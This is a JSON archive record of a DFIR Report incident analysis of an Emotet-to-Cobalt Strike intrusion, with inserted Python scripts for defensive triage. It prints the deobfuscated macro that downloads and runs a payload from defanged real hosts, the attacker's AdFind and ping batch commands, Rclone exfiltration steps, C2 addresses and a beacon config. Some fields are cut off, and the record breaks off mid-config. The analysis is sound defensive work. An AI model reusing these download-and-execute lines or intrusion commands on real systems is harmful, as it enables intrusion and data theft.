{
	"id": "8e843a24-66a5-470f-951d-d1bad403c7c2",
	"created_at": "2026-04-06T00:07:13.372178Z",
	"updated_at": "2026-04-10T03:32:50.046674Z",
	"deleted_at": null,
	"sha1_hash": "f991ff9f99d7377f2bbe581513b076c4315664ca",
	"title": "Dead or Alive? An Emotet Story - The DFIR Report",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 10427231,
	"plain_text": "Dead or Alive? An Emotet Story - The DFIR Report\r\nBy editor\r\nPublished: 2022-09-12 · Archived: 2026-04-02 12:22:00 UTC\r\nIn this intrusion from May 2022, we observed a domain-wide compromise that started from a malware-ridden Excel document containing the never-dying malware, Emotet.\r\nPost-exploitation activity began once Emotet deployed a Cobalt Strike beacon on the beachhead host, roughly a day after the initial compromise, at which point the threat actors started enumerating the network. After three days of discovery and lateral movement, the threat actors exfiltrated sensitive data using Rclone before leaving the network.\r\nAfter a successful takedown thanks to Europol and Eurojust efforts, Emotet was resurrected in November 2021 with the help of Trickbot malware. Since then, Emotet has been testing different initial access payloads while its developers were busy improving the core functionality of the malware itself. Since January 2022 we have observed an increase in Cobalt Strike deployments following Emotet infections.\r\nIn a few weeks, we’ll have another Emotet report out from June, where the intrusion used similar TTPs and ended in ransomware.\r\nCase Summary\r\nBack in May, we witnessed an intrusion that started from a phishing email which included Emotet. The intrusion lasted four days and contained many of the usual suspects, including the Cobalt Strike post-exploitation framework.\r\nThe Emotet infection was delivered using an xls file containing a malicious Excel 4.0 (XLM) macro, a technique that has been on the wane in recent months. 
Once executed, Emotet ran a few basic Windows discovery commands (systeminfo, ipconfig, etc.), wrote a registry Run key for persistence, and made its initial callouts to its command and control servers.\r\nAround 40 minutes after the initial execution, the Emotet malware started a new Emotet email spreader campaign. This entailed connecting to various email servers and sending new emails with attached xls and zip files. This activity continued until the UTC clock turned over to the next day, at which point the email spreader halted for a period of time; around seven hours into the second day, it began running again.\r\nAround 26 hours after the initial infection, while still running the email spreader, the Emotet malware pulled down and executed a Cobalt Strike payload on the beachhead host. Right after the beacon was executed, the threat actors began enumerating the network using native Windows binaries and the PowerView function Invoke-ShareFinder. Around 30 minutes after dropping the beacon, the threat actor injected into a dllhost.exe process and then proceeded to dump credentials from LSASS. Another 20 minutes later, the threat actor ran Invoke-ShareFinder again, along with Invoke-Kerberoast.\r\nAt 29 hours from initial access, the threat actors began their first lateral movement. This was achieved by transferring a Cobalt Strike DLL over SMB and executing it via a remote service on another workstation. From there, they ran Invoke-ShareFinder once again, along with AdFind, using a batch file named find.bat. Pass-the-Hash behavior was observed targeting several accounts on the lateral host. Use of Cobalt Strike’s getsystem command was also apparent in the logs.\r\nThe threat actors then proceeded to do additional network discovery using a batch script named p.bat to ping all servers in the network. 
More account discovery was then observed, with queries for Domain Admins and a backup account.\r\nAt 31 hours into the intrusion, the threat actors pivoted to the Domain Controller using the same Cobalt Strike DLL. Once on the Domain Controller, the threat actors again used getsystem to elevate and then dumped LSASS. After completing that activity, the threat actors chose another server and pushed a file, 1.msi, to it: the installation package for Atera, giving them an additional means of persistence and command and control. During this whole second day, the original Emotet infection on the beachhead host was still trying to send more malicious emails, finally stopping for the day a little before 23:00 UTC.\r\nThey returned the next day, at the same time as the previous day, and picked up where they left off. They pivoted to a couple of workstations on the network using Cobalt Strike and installed Atera and Splashtop with a different MSI installer. Once again, they executed Invoke-ShareFinder, AdFind, and the p.bat batch script to ping online servers. Using the remote admin tools, they ran Rclone to exfiltrate important data from a file server and upload it to MEGA. Interestingly, the threat actors exfiltrated the same data twice, running Rclone with the --ignore-existing parameter (which skips files already present on the destination) from two different hosts on the network. Around 20:00 UTC the Emotet infection on the beachhead host began its email spreader activity again, only to halt at the changeover at 00:00 UTC.\r\nOn the last day of this intrusion, the threat actors returned during their normal working hours and used Rclone to exfiltrate IT-related data from a separate server. This was the last activity we observed from this group. These cases commonly end up with ransomware in addition to data exfiltration. 
This, however, was not the case with this intrusion, as the threat actors were evicted before any final actions could be taken.\r\nhttps://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\nServices\r\nWe offer multiple services including a Threat Feed service which tracks Command and Control frameworks such as Cobalt Strike, BumbleBee, Covenant, Metasploit, Empire, PoshC2, etc. More information on this service and others can be found here.\r\nWe also have artifacts and IOCs available from this case such as pcaps, memory captures, files, event logs including Sysmon, KAPE packages, and more, under our Security Researcher and Organization services.\r\nTimeline\r\nAnalysis and reporting completed by @Kostastsale and @IcsNick\r\nInitial Access\r\nThe threat actor gained access to the environment after a user opened an Excel document and enabled macros. The document came in via email in the form of a zip file which included an xls file. 
Thanks for sharing @proxylife!\r\nThe document contains hidden sheets, uses white characters on a white background, and is attributed to SilentBuilder, the document builder used by Emotet epoch 5.\r\nTo deobfuscate the document, the tool xlmdeobfuscator was used with the following output.\r\nAfter deobfuscation and clean-up, the code in the macro looks as follows.\r\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCBB\",0,\"http[:]//praachichemfood[.]com/wp-content/Mwmos/\",\"..\\hvxda.oc\r\n=IF(JRSJG1\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCBB\",0,\"https[:]//lopespublicidade[.]com/cgi-bin/e5R5oG4iE\r\n=IF(JRSJG2\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCBB\",0,\"https[:]//bosny[.]com/aspnet_client/rnMp0ofR/\",\".\r\n=IF(JRSJG3\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCBB\",0,\"http[:]//seasidesolutions[.]com/cgi-bin/WLoO6sEzYC\r\n=IF(JRSJG4\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCBB\",0,\"http[:]//borgelin[.]org/belzebub/okwRWz1C/\",\"..\\hv\r\n=IF(JRSJG5\u003c0, CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCBB\",0,\"http[:]//loa-hk[.]com/wp-content/ffBag/\",\"..\\hvxd\r\n=IF(JRSJG6\u003c0, CLOSE(0),)\r\n=EXEC(\"C:\\Windows\\System32\\regsvr32.exe ..\\hvxda.ocx\")\r\n=R\r\nEach CALL line evaluates to the HRESULT returned by URLDownloadToFileA, and the IF lines read that result back (JRSJG1 to JRSJG6 hold the return values of the six calls): the next URL is only tried when the previous download failed with a negative HRESULT, the workbook is closed without saving (CLOSE(0)) if all six fail, and otherwise the dropped file is run through regsvr32.exe.\r\nExecution\r\nEmotet Execution\r\nExecution is done from the Excel document using regsvr32.exe with the payload hvxda.ocx, a DLL that also appears under a random-character name, llJyMIOvft.dll. 
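To make the fallback chain concrete, here is an added example (written for this edit, not code from the DFIR Report) that parses a deobfuscated XLM listing like the one above and pulls out the ordered download attempts, the guard that enables each one, the drop path and the final EXEC command. The sample listing embedded in the script is reconstructed from the formulas shown above, with the URLs completed from the Command and Control section of this report; the trailing arguments of each CALL are an assumption, since the listing on the page is truncated.

```python
"""Parse a deobfuscated Emotet XLM (Excel 4.0 macro) download chain.

Added example, not part of the original DFIR Report write-up. MACRO below is
reconstructed from the formulas shown in the report (URLs completed from the
report's Command and Control section); the trailing CALL arguments are assumed,
since the listing on the page is truncated. Run xlmdeobfuscator first on a real
document; this only handles the cleaned-up formulas.
"""
import re

MACRO = r'''
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http[:]//praachichemfood[.]com/wp-content/Mwmos/","..\hvxda.ocx",0,0)
=IF(JRSJG1<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https[:]//lopespublicidade[.]com/cgi-bin/e5R5oG4iEaQnxQrZDh/","..\hvxda.ocx",0,0),)
=IF(JRSJG2<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https[:]//bosny[.]com/aspnet_client/rnMp0ofR/","..\hvxda.ocx",0,0),)
=IF(JRSJG3<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http[:]//seasidesolutions[.]com/cgi-bin/WLoO6sEzYCJ3LTlC/","..\hvxda.ocx",0,0),)
=IF(JRSJG4<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http[:]//borgelin[.]org/belzebub/okwRWz1C/","..\hvxda.ocx",0,0),)
=IF(JRSJG5<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http[:]//loa-hk[.]com/wp-content/ffBag/","..\hvxda.ocx",0,0),)
=IF(JRSJG6<0, CLOSE(0),)
=EXEC("C:\Windows\System32\regsvr32.exe ..\hvxda.ocx")
'''

# A download line: the defanged URL followed by the local file name argument.
DOWNLOAD_RE = re.compile(r'URLDownloadToFileA.*?"(https?\[:\]//[^"]+)"\s*,\s*"([^"]*)"')
# Guard of the form =IF(<name><0, ...): the previous attempt's HRESULT was negative.
GUARD_RE = re.compile(r'^=IF\(\s*([A-Za-z]+\d+)\s*<\s*0\s*,')
EXEC_RE = re.compile(r'^=EXEC\("([^"]+)"\)')


def refang(url):
    """Turn the report's defanged form back into a usable indicator."""
    return url.replace("[:]", ":").replace("[.]", ".")


def parse_macro(text):
    """Return the download attempts in order, the failure handling and the command run.

    Each attempt records the guard that enables it: None for the unconditional first
    CALL, otherwise the name whose negative HRESULT (a failed download) triggers it.
    """
    attempts, exec_cmd, closes_on_failure = [], None, False
    for raw in text.strip().splitlines():
        line = raw.strip()
        guard = GUARD_RE.match(line)
        dl = DOWNLOAD_RE.search(line)
        if dl:
            attempts.append({
                "url": refang(dl.group(1)),
                "drop_path": dl.group(2),
                "guard": guard.group(1) if guard else None,
            })
        elif guard and "CLOSE(" in line:
            closes_on_failure = True  # every download failed: close without saving
        else:
            ex = EXEC_RE.match(line)
            if ex:
                exec_cmd = ex.group(1)
    return {
        "attempts": attempts,
        "drop_paths": sorted({a["drop_path"] for a in attempts}),
        "closes_on_failure": closes_on_failure,
        "exec": exec_cmd,
    }


def hunting_hints(parsed):
    """Derive the artefacts a responder would pivot on from the parsed chain."""
    hints = [f"url: {a['url']}" for a in parsed["attempts"]]
    if parsed["exec"]:
        image, _, arg = parsed["exec"].partition(" ")
        # An Excel 4.0 EXEC spawns the child from the Excel process, so the
        # parent/child pair is the process-creation artefact to hunt for.
        hints.append(f"process: EXCEL.EXE -> {image} {arg}")
    return hints


if __name__ == "__main__":
    result = parse_macro(MACRO)
    for n, a in enumerate(result["attempts"], 1):
        print(f"{n}. {a['url']}  (guard: {a['guard'] or 'unconditional'})")
    print("closes on total failure:", result["closes_on_failure"])
    print("exec:", result["exec"])
    print("\n".join(hunting_hints(result)))
```

The guard list is the useful output for triage: it tells you which URL the document would have reached only after the earlier hosts failed, which is exactly the situation the next paragraph describes.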
Worth noting, the Excel document failed to download the second-stage payload from a few of the embedded URLs before one of them succeeded.\r\nA new file is then created under %USERPROFILE%\\AppData\\Local\\ in a folder whose name also consists of random characters.\r\nCobalt Strike Execution\r\nThe Emotet DLL is then used to download Cobalt Strike, which is then injected into svchost and dllhost.\r\nSysmon showing Emotet starting the Cobalt Strike executable.\r\nA great way to get the Malleable C2 profile (and additional beacon config) is to use Didier Stevens’s fantastic tool 1768.py. Here, the tool is run against a process dump of the executable.\r\nPersistence\r\nThe Emotet infection on the beachhead host used a registry Run key to maintain persistence.\r\nThis registry key activity (Sysmon Event ID 12 \u0026 13) was observed continuously on the beachhead host for the first few days of the intrusion.\r\nBeyond the beachhead host, the threat actor deployed several Atera/Splashtop remote access tools across the environment as an alternative means of access should they lose their Cobalt Strike beacons.\r\nPrivilege Escalation\r\nUse of Cobalt Strike’s getsystem named-pipe impersonation technique was observed on the Domain Controller and other hosts to elevate to SYSTEM privileges.\r\nDefense Evasion\r\nProcess injection was observed during the intrusion by both Emotet and Cobalt Strike. Emotet injected multiple times into svchost to execute certain functions, including discovery commands.\r\nCobalt Strike used process hollowing to launch its post-exploitation jobs under dllhost.exe, the spawnto target in its Malleable profile. 
We later saw dllhost.exe injecting into multiple other processes, such as explorer.exe and svchost.exe, to execute further payloads.\r\nScanning process memory across affected hosts with Malpedia's win_cobalt_strike_auto YARA rule reveals both the direct Cobalt Strike processes and the processes they injected into:\r\nPid | ProcessName | CommandLine | Rule\r\n4616 | svchost.exe | C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup -s CDPUserSvc | win_cobalt_strike_auto\r\n4844 | svchost.exe | C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup -s WpnUserService | win_cobalt_strike_auto\r\n10256 | UOmCgbXygCe.exe | \"C:\\Users\\USER\\AppData\\Local\\FrlxbduRbdVAbVbS\\UOmCgbXygCe.exe\" | win_cobalt_strike_auto\r\n836 | svchost.exe | C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p | win_cobalt_strike_auto\r\n1008 | svchost.exe | C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p -s LSM | win_cobalt_strike_auto\r\n9308 | regsvr32.exe | regsvr32 C:\\ProgramData\\1.dll | win_cobalt_strike_auto\r\n1056 | svchost.exe | C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted -p | win_cobalt_strike_auto\r\n1428 | svchost.exe | C:\\Windows\\system32\\svchost.exe -k ICService -p | win_cobalt_strike_auto\r\n6036 | regsvr32.exe | regsvr32 C:\\ProgramData\\1.dll | win_cobalt_strike_auto\r\nThe two regsvr32.exe entries are the laterally transferred beacon DLL, 1.dll, loaded from C:\\ProgramData; the svchost.exe hits are service hosts the beacon injected into.\r\nCredential Access\r\nOn the beachhead host, credentials appear to have been dumped by code injected into the SearchIndexer process. 
Sysmon Event ID 10 (process access) shows SearchIndexer.exe opening LSASS, similar to behavior observed in a prior case, followed by a named pipe (Sysmon Event ID 17) whose name comes from a known Cobalt Strike Malleable C2 profile.\r\nEventID: 10\r\nSourceImage: C:\\Windows\\system32\\SearchIndexer.exe\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 136208\r\nCallTrace:\r\nC:\\Windows\\SYSTEM32\\ntdll.dll+9d1e4|C:\\Windows\\System32\\KERNELBASE.dll+2bcbe|C:\\Program Files\\Common Files\\Mic\r\nEventID: 17\r\nEventType: CreatePipe\r\nImage: C:\\Windows\\system32\\SearchIndexer.exe\r\nPipeName: \\SearchTextHarvester\r\nThe GrantedAccess value 136208 is 0x21410, which decodes to PROCESS_VM_READ (0x10), PROCESS_QUERY_INFORMATION (0x400), PROCESS_QUERY_LIMITED_INFORMATION (0x1000) and READ_CONTROL (0x20000): enough to read LSASS memory, and not something the search indexer has any reason to request from lsass.exe.\r\nShortly after the credential dump via the SearchIndexer process, the Cobalt Strike process ran Invoke-Kerberoast looking for roastable accounts within the organization.\r\nWe observed Cobalt Strike beacons accessing LSASS on multiple occasions, on almost every compromised host.\r\nDiscovery\r\nOn the first day of the intrusion, the Emotet malware performed some basic discovery on the host using built-in Windows utilities.\r\nsysteminfo\r\nipconfig /all\r\nOn the second day, the hands-on activity from Cobalt Strike performed a more thorough examination of that host’s Windows domain.\r\nC:\\Windows\\system32\\cmd.exe /C net group \"Domain Computers\" /domain\r\nC:\\Windows\\system32\\cmd.exe /C net group /domain \"Domain Admins\"\r\nC:\\Windows\\system32\\cmd.exe /C net group /domain \"Enterprise Admins\"\r\nC:\\Windows\\system32\\cmd.exe /C systeminfo\r\nC:\\Windows\\system32\\cmd.exe /C net users\r\nC:\\Windows\\system32\\cmd.exe /C nltest /DOMAIN_TRUSTS\r\nThe threat actors launched the PowerView function Invoke-ShareFinder from almost all of the hosts to which they pivoted, including the domain controller.\r\nAdFind.exe, the command-line Active Directory query tool, was run on 
only one of the compromised hosts, via the find.bat batch script (the AdFind binary had been renamed to find.exe). The contents of the script are below:\r\nfind.exe -f \"(objectcategory=person)\" \u003e ad_users.txt\r\nfind.exe -f \"objectcategory=computer\" \u003e ad_computers.txt\r\nfind.exe -f \"(objectcategory=organizationalUnit)\" \u003e ad_ous.txt\r\nfind.exe -sc trustdmp \u003e trustdmp.txt\r\nfind.exe -subnets -f (objectCategory=subnet)\u003e subnets.txt\r\nfind.exe -f \"(objectcategory=group)\" \u003e ad_group.txt\r\nfind.exe -gcb -sc trustdmp \u003e trustdmp.txt\r\necho end\r\nUsing the data collected from previous activity, they created a target list which was then fed to a batch script named p.bat. The batch file contained one line, which sent a single ping to each server in a list (SERVERS.txt) and appended the results to res.txt:\r\nfor /f %%i in (SERVERS.txt) do ping %%i -n 1 \u003e\u003e res.txt\r\nAdditionally, the threat actors listed the share directories with the dir command through the Cobalt Strike beacon's interactive shell.\r\nLateral Movement\r\nThe Cobalt Strike jump psexec command (run a service EXE on the remote host) produced a System event ID 7045 (a service was installed) on the remote hosts. Example:\r\nBelow, the network traffic shows the SMB lateral transfer of one of the Atera Agent MSI installers (1.msi) used to gain access laterally on a host and provide persistence for later access.\r\nThe same can be observed for other payloads used during the intrusion as well; here we can see that same data in Zeek logs when the threat actors transferred the 1.dll Cobalt Strike beacon laterally to gain access to additional hosts.\r\nWe also observed Pass-the-Hash used throughout the intrusion via the Cobalt Strike beacons. The threat actors used PTH to acquire a session with elevated user access. 
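Both the Sysmon Event ID 10 record quoted under Credential Access above and the Pass-the-Hash indicators listed next (a 4624 with logon type 9, the seclogo logon process and the Negotiate package on the source host) can be checked mechanically. The following is an added example, not code from the DFIR Report: it parses events in the same Field: value text form the page uses, decodes the LSASS access mask, and flags PTH-style logons. The sample events are constructed (the first mirrors the SearchIndexer record above with the CallTrace omitted; host names, account names and timestamps are invented), and the list of images expected to read LSASS is an assumption to be tuned per environment.

```python
"""Triage Sysmon 10 (LSASS access) and Security 4624 (Pass-the-Hash footprint) events.

Added example, not part of the original DFIR Report write-up. Events use the
`Field: value` text form shown on the page. SAMPLE_EVENTS is constructed: the first
record mirrors the SearchIndexer -> lsass.exe access from the report (CallTrace
omitted); hosts, accounts and timestamps are invented. Access-right constants are
the Windows process access rights from winnt.h.
"""

# Process access rights that matter for reading LSASS memory (winnt.h values).
ACCESS_BITS = {
    0x0010: "PROCESS_VM_READ",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x20000: "READ_CONTROL",
}

# Images allowed to open lsass.exe with read rights (assumption; tune per environment).
EXPECTED_LSASS_READERS = {"c:\\windows\\system32\\csrss.exe", "c:\\windows\\system32\\wininit.exe"}

SAMPLE_EVENTS = [
    # Sysmon 10: the record from this case (CallTrace omitted), host name invented.
    """EventID: 10
Computer: WS01
SourceImage: C:\\Windows\\system32\\SearchIndexer.exe
TargetImage: C:\\Windows\\system32\\lsass.exe
GrantedAccess: 136208""",
    # Sysmon 10: benign query-only access from wininit.exe (constructed).
    """EventID: 10
Computer: WS01
SourceImage: C:\\Windows\\System32\\wininit.exe
TargetImage: C:\\Windows\\system32\\lsass.exe
GrantedAccess: 0x1400""",
    # Security 4624: the source-host footprint of Cobalt Strike's pth (constructed).
    """EventID: 4624
Computer: WS01
TimeCreated: 2022-05-20T10:15:02
TargetUserName: jdoe
LogonType: 9
LogonProcessName: seclogo
AuthenticationPackageName: Negotiate""",
    # Security 4624: an ordinary interactive logon (constructed).
    """EventID: 4624
Computer: WS01
TimeCreated: 2022-05-20T08:00:00
TargetUserName: jdoe
LogonType: 2
LogonProcessName: User32
AuthenticationPackageName: Negotiate""",
]


def parse_event(text):
    """'Field: value' lines -> dict with lower-cased keys (split on the first colon)."""
    rec = {}
    for line in text.strip().splitlines():
        key, sep, val = line.partition(":")
        if sep:
            rec[key.strip().lower()] = val.strip()
    return rec


def decode_access(mask):
    """Names of the access rights set in a GrantedAccess value ('136208' or '0x21410')."""
    value = int(str(mask), 0)
    return [name for bit, name in sorted(ACCESS_BITS.items()) if value & bit]


def flag_lsass_access(rec):
    """Sysmon 10: an unexpected image opening lsass.exe with PROCESS_VM_READ."""
    if rec.get("eventid") != "10" or not rec.get("targetimage", "").lower().endswith("\\lsass.exe"):
        return None
    rights = decode_access(rec.get("grantedaccess", "0"))
    source = rec.get("sourceimage", "")
    if "PROCESS_VM_READ" in rights and source.lower() not in EXPECTED_LSASS_READERS:
        return {"host": rec.get("computer"), "source": source, "rights": rights}
    return None


def flag_pth_logon(rec):
    """Security 4624, logon type 9 (NewCredentials), logon process seclogo, package
    Negotiate: the source-host pattern listed in the report. TargetUserName here is
    the user who ran the tool, not the account whose hash was passed."""
    if rec.get("eventid") != "4624" or rec.get("logontype") != "9":
        return None
    if (rec.get("logonprocessname", "").lower() == "seclogo"
            and rec.get("authenticationpackagename", "").lower() == "negotiate"):
        return {"host": rec.get("computer"), "operator_account": rec.get("targetusername"),
                "time": rec.get("timecreated")}
    return None


def triage(event_texts):
    """Run both checks over raw event text and collect the hits."""
    hits = {"lsass_access": [], "pth_logons": []}
    for text in event_texts:
        rec = parse_event(text)
        for key, check in (("lsass_access", flag_lsass_access), ("pth_logons", flag_pth_logon)):
            hit = check(rec)
            if hit:
                hits[key].append(hit)
    return hits


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_EVENTS), indent=2))
```

Because the type 9 event names the operator's own account, the account whose hash was actually passed has to be recovered from the other end of the connection (the 4776 on the domain controller, or the 4624 on the target host), not from this record.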
We observed the below logs being generated on the source host and domain controller that indicate the use of PTH. Note that the account shown in a logon type 9 event is the user who ran the tool, not the account whose hash was passed; the passed account only appears downstream, in the NTLM validation on the domain controller.\r\nSource Host:\r\n- Windows EID 4624\r\nLogon Type = 9\r\nAuthentication Package = Negotiate\r\nLogon Process = seclogo\r\n- Windows EID 467\r\nDomain Controller:\r\n- Windows EID 4776\r\nYou can read more about detecting “Pass-The-Hash” here by Stealthbits and here by Hausec.\r\nCommand and Control\r\nEmotet\r\nIn the Emotet Excel document, the following URLs are hard-coded (and obfuscated) to download the second stage; they are tried in the order shown until one succeeds.\r\nhttp[:]//praachichemfood[.]com/wp-content/Mwmos/\r\nhttps[:]//lopespublicidade[.]com/cgi-bin/e5R5oG4iEaQnxQrZDh/\r\nhttps[:]//bosny[.]com/aspnet_client/rnMp0ofR/\r\nhttp[:]//seasidesolutions[.]com/cgi-bin/WLoO6sEzYCJ3LTlC/\r\nhttp[:]//borgelin[.]org/belzebub/okwRWz1C/\r\nhttp[:]//loa-hk[.]com/wp-content/ffBag/\r\nThe second stage of Emotet has a set of hard-coded IPs that it tries to connect to after the DLL is executed.\r\nhxxps[://]103[.]133[.]214[.]242/\r\nhxxps[://]103[.]133[.]214[.]242:8080/\r\nhxxps[://]103[.]41[.]204[.]169/\r\nhxxps[://]103[.]41[.]204[.]169:8080/\r\nhxxps[://]103[.]42[.]58[.]120/\r\nhxxps[://]103[.]42[.]58[.]120:7080/\r\nhxxps[://]103[.]56[.]149[.]105/\r\nhxxps[://]103[.]56[.]149[.]105:8080/\r\nhxxps[://]103[.]8[.]26[.]17/\r\nhxxps[://]103[.]8[.]26[.]17:8080/\r\nhxxps[://]104[.]248[.]225[.]227/\r\nhxxps[://]104[.]248[.]225[.]227:8080/\r\nhxxps[://]110[.]235[.]83[.]107/\r\nhxxps[://]110[.]235[.]83[.]107:7080/\r\nhxxps[://]116[.]124[.]128[.]206/\r\nhxxps[://]116[.]124[.]128[.]206:8080/\r\nhxxps[://]118[.]98[.]72[.]86/\r\nhxxps[://]134[.]122[.]119[.]23/\r\nhxxps[://]134[.]122[.]119[.]23:8080/\r\nhxxps[://]139[.]196[.]72[.]155:8080/\r\nhxxps[://]159[.]69[.]237[.]188/\r\nhxxps[://]175[.]126[.]176[.]79/\r\nhxxps[://]175[.]126[.]176[.]79:8080/\r\nhxxps[://]178[.]62[.]112[.]199/\r\nhxxps[://]178[.]62[.]112[.]199:8080/\r\nhxxps[://]185[.]148[.]168[.]220/\r\nhxxps[://]185[.]148[.]
168[.]220:8080/\r\nhxxps[://]188[.]225[.]32[.]231/\r\nhxxps[://]188[.]225[.]32[.]231:4143/\r\nhxxps[://]190[.]90[.]233[.]66/\r\nhxxps[://]194[.]9[.]172[.]107/\r\nhxxps[://]194[.]9[.]172[.]107:8080/\r\nhxxps[://]195[.]154[.]146[.]35/\r\nhxxps[://]195[.]77[.]239[.]39/\r\nhxxps[://]195[.]77[.]239[.]39:8080/\r\nhxxps[://]196[.]44[.]98[.]190/\r\nhxxps[://]196[.]44[.]98[.]190:8080/\r\nhxxps[://]202[.]134[.]4[.]210/\r\nhxxps[://]202[.]134[.]4[.]210:7080/\r\nhxxps[://]202[.]28[.]34[.]99/\r\nhxxps[://]202[.]28[.]34[.]99:8080/\r\nhxxps[://]202[.]29[.]239[.]162/\r\nhxxps[://]203[.]153[.]216[.]46/\r\nhxxps[://]207[.]148[.]81[.]119/\r\nhxxps[://]207[.]148[.]81[.]119:8080/\r\nhxxps[://]210[.]57[.]209[.]142/\r\nhxxps[://]210[.]57[.]209[.]142:8080/\r\nhxxps[://]217[.]182[.]143[.]207/\r\nhxxps[://]36[.]67[.]23[.]59/\r\nhxxps[://]37[.]44[.]244[.]177/\r\nhxxps[://]37[.]44[.]244[.]177:8080/\r\nhxxps[://]37[.]59[.]209[.]141/\r\nhxxps[://]37[.]59[.]209[.]141:8080/\r\nhxxps[://]45[.]71[.]195[.]104:8080/\r\nhxxps[://]5[.]56[.]132[.]177:8080/\r\nhxxps[://]51[.]68[.]141[.]164:8080/\r\nhxxps[://]54[.]37[.]106[.]167:8080/\r\nhxxps[://]54[.]37[.]228[.]122/\r\nhxxps[://]54[.]38[.]143[.]246/\r\nhxxps[://]54[.]38[.]143[.]246:7080/\r\nhxxps[://]54[.]38[.]242[.]185/\r\nhxxps[://]59[.]148[.]253[.]194/\r\nhxxps[://]62[.]171[.]178[.]147:8080/\r\nhxxps[://]66[.]42[.]57[.]149/\r\nhxxps[://]68[.]183[.]91[.]111/\r\nhxxps[://]68[.]183[.]91[.]111:8080/\r\nhxxps[://]68[.]183[.]93[.]250/\r\nhxxps[://]78[.]46[.]73[.]125/\r\nhxxps[://]78[.]47[.]204[.]80/\r\nhxxps[://]85[.]214[.]67[.]203/\r\nhxxps[://]85[.]214[.]67[.]203:8080/\r\nhxxps[://]85[.]25[.]120[.]45/\r\nhxxps[://]85[.]25[.]120[.]45:8080/\r\nhxxps[://]87[.]106[.]97[.]83/\r\nhxxps[://]87[.]106[.]97[.]83:7080/\r\nhxxps[://]88[.]217[.]172[.]165/\r\nhxxps[://]88[.]217[.]172[.]165:8080/\r\nhxxps[://]93[.]104[.]209[.]107/\r\nhxxps[://]93[.]104[.]209[.]107:8080/\r\nCobalt 
Strike\r\nEmotet, later on, deployed Cobalt Strike for additional functionality.\r\n59.95.98.204\r\nJA3: 72a589da586844d7f0818ce684948eea\r\nJA3S: f176ba63b4d68e576b5ba345bec2c7b7\r\nCertificate: [66:f7:4c:f9:56:5d:fe:15:a6:8c:62:b9:3d:72:cb:8e:c9:e9:89:02]\r\nNot Before: 2022/05/19 12:22:46 UTC\r\nNot After: 2023/05/19 12:22:46 UTC\r\nIssuer Org: jQuery\r\nSubject Common: jquery.com\r\nThe jQuery issuer and jquery.com subject, together with the /jquery-3.3.1.min.js GET and /jquery-3.3.2.min.js POST URIs in the configuration below, are the defaults of the public jquery-c2 Malleable C2 profile, which is why the Emerging Threats \"Cobalt Strike Malleable C2 JQuery Custom Profile\" signatures listed under Detections fire on this traffic. A sleeptime of 45000 ms with 37% jitter means the beacon checks in at a random interval between roughly 28 and 45 seconds, and the spawnto_x86/spawnto_x64 values are the source of the dllhost.exe activity described under Defense Evasion. The configuration as extracted by 1768.py:\r\n{\r\n \"beacontype\": [\r\n \"HTTP\"\r\n ],\r\n \"sleeptime\": 45000,\r\n \"jitter\": 37,\r\n \"maxgetsize\": 1403644,\r\n \"spawnto\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"license_id\": 206546002,\r\n \"cfg_caution\": false,\r\n \"kill_date\": null,\r\n \"server\": {\r\n \"hostname\": \"59.95.98.204\",\r\n \"port\": 8080,\r\n \"publickey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCfWiK6EPk2D2Ho7CBgdUfK2kqa/1x2L0Tt0R4Pl/Sof+7skIOqclxG\r\n },\r\n \"host_header\": \"\",\r\n \"useragent_header\": null,\r\n \"http-get\": {\r\n \"uri\": \"/jquery-3.3.1.min.js\",\r\n \"verb\": \"GET\",\r\n \"client\": {\r\n \"headers\": null,\r\n \"metadata\": null\r\n },\r\n \"server\": {\r\n \"output\": [\r\n \"print\",\r\n \"append 1522 characters\",\r\n \"prepend 84 characters\",\r\n \"prepend 3931 characters\",\r\n \"base64url\",\r\n \"mask\"\r\n ]\r\n }\r\n },\r\n \"http-post\": {\r\n \"uri\": \"/jquery-3.3.2.min.js\",\r\n \"verb\": \"POST\",\r\n \"client\": {\r\n \"headers\": null,\r\n \"id\": null,\r\n \"output\": null\r\n }\r\n },\r\n \"tcp_frame_header\": \"AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"crypto_scheme\": 0,\r\n \"proxy\": {\r\n \"type\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"behavior\": \"Use IE settings\"\r\n },\r\n \"http_post_chunk\": 0,\r\n \"uses_cookies\": true,\r\n \"post-ex\": {\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\",\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\"\r\n },\r\n 
